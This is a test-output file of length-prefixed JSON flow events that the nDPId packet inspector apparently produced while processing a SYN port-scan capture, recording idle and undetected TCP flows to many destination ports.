+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":985,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1862,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061210,"flow_last_seen":1278275061210,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2366,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1062,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":31038,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059346,"flow_last_seen":1278275059346,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":601,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059455,"flow_last_seen":1278275059455,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":10566,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1016,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1089,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060176,"flow_last_seen":1278275060176,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2381,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":295,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058596,"flow_last_seen":1278275058596,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":740,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059631,"flow_last_seen":1278275059631,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":325,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058720,"flow_last_seen":1278275058720,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2382,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":815,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059741,"flow_last_seen":1278275059741,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2383,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1497,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060699,"flow_last_seen":1278275060699,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060800,"flow_last_seen":1278275060800,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":340,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":417,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058971,"flow_last_seen":1278275058971,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1291,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060438,"flow_last_seen":1278275060438,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":449,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059095,"flow_last_seen":1278275059095,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2393,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1359,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060540,"flow_last_seen":1278275060540,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2394,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":991,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060006,"flow_last_seen":1278275060006,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1195,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060292,"flow_last_seen":1278275060292,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
+00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1056,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060115,"flow_last_seen":1278275060115,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060948,"flow_last_seen":1278275060948,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":20828,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} +00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060392,"flow_last_seen":1278275060392,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":4444,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1015,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060066,"flow_last_seen":1278275060066,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":4445,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 
